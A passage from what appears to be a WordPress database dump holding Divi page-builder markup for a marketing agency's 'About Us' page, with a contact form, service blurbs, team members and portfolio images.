button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:05:12','2020-08-07 19:05:12','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(546,1,'2020-08-07 19:14:27','2020-08-07 19:14:27','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column 